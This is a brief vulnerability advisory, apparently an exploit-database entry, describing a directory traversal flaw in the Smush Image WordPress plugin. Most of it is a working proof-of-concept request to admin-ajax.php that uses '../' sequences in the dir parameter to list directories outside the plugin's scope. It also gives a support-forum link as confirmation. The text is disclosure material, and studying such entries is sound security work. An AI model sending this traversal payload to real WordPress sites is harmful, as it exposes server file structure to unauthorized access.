Class File transversal Remote Yes Credit Ricardo Sanchez Smush Image Wordpress WP plugin is prone to file transversal vulnerability because it fails to sufficiently folders privacy. To exploit this issue following steps: Demo url: http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx Confirm: https://wordpress.org/support/topic/file-transversal-bug/#post-9554401